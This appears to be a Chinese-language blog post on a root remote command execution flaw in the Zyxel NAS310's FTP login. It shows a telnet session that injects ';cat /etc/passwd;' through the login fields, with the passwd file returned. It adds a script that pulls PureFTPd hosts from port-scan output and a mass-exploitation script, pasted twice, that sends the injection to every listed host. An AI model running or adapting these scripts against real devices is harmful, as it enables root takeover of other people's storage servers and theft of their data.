概要
Zyxel NAS310是一款具备资料存储功能的装置,因此也称为“网络存储器”。它是一种专用数据存储服务器。它以数据为中心,将存储设备与服务器彻底分离,集中 管理数据,从而释放带宽、提高性能、降低总拥有成本、保护投资。其成本远远低于使用服务器存储,而效率却远远高于后者。
国外安全研究员披露Zyxel NAS310存在一个远程命令执行漏洞(https://blogs.securiteam.com/index.php/archives/2694 ) ,NAS310在FTP登录时对传入的参数没有有效过滤,导致攻击者可以注入系统命令并执行,且执行权限是root最高权限。
1.测试:
$ telnet 192.168.219.101 21 Trying 192.168.219.101... Connected to 192.168.219.101. Escape character is '^]'. 220 Welcome to PureFTPd [TLS] 220 You are user number 1 of 10 allowed. 220 Local time is now 22:46. Server port: 21. 220 This is a private system No anonymous login 220 IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. user ' 331 User ' OK. Password required pass ';cat /etc/passwd; root:x:0:0:root:/root:/bin/sh
2.从端口扫描器扫描结果提取banner里面包含PureFTPd的ip
#!/usr/bin/env python # encoding: utf-8 import os from fileutils import FileUtils import re for line in FileUtils.getLines('result.txt'): if re.search(r'Welcome to PureFTPd',line): ip = re.search(r'\d+\.\d+\.\d+\.\d+',line) print ip.group() fp = open('filter.txt','a') fp.write(ip.group() + '\n') fp.close() else: pass
3.测试脚本
#!/usr/bin/env python
# encoding: utf-8
import sys
import os
from fileutils import FileUtils
import telnetlib
username = 'user \''
password = 'pass \';cat /etc/passwd;'
def verify(Host):
print Host
global tn
try:
tn = telnetlib.Telnet(Host, port=21, timeout=5)
tn.set_debuglevel(2)
except Exception,e:
tn.close()
pass
else:
if tn.read_until('220 You will be disconnected',timeout=3):
tn.write(username + '\r\n')
else:
tn.close()
if tn.read_until('OK. Password required',timeout=3):
tn.write(password + '\r\n')
tn.close()
else:
tn.close()
if __name__ == '__main__':
for host in FileUtils.getLines('ip.lst'):
verify(host)
# encoding: utf-8
import sys
import os
from fileutils import FileUtils
import telnetlib
username = 'user \''
password = 'pass \';cat /etc/passwd;'
def verify(Host):
print Host
global tn
try:
tn = telnetlib.Telnet(Host, port=21, timeout=5)
tn.set_debuglevel(2)
except Exception,e:
tn.close()
pass
else:
if tn.read_until('220 You will be disconnected',timeout=3):
tn.write(username + '\r\n')
else:
tn.close()
if tn.read_until('OK. Password required',timeout=3):
tn.write(password + '\r\n')
tn.close()
else:
tn.close()
if __name__ == '__main__':
for host in FileUtils.getLines('ip.lst'):
verify(host)
测试效果:
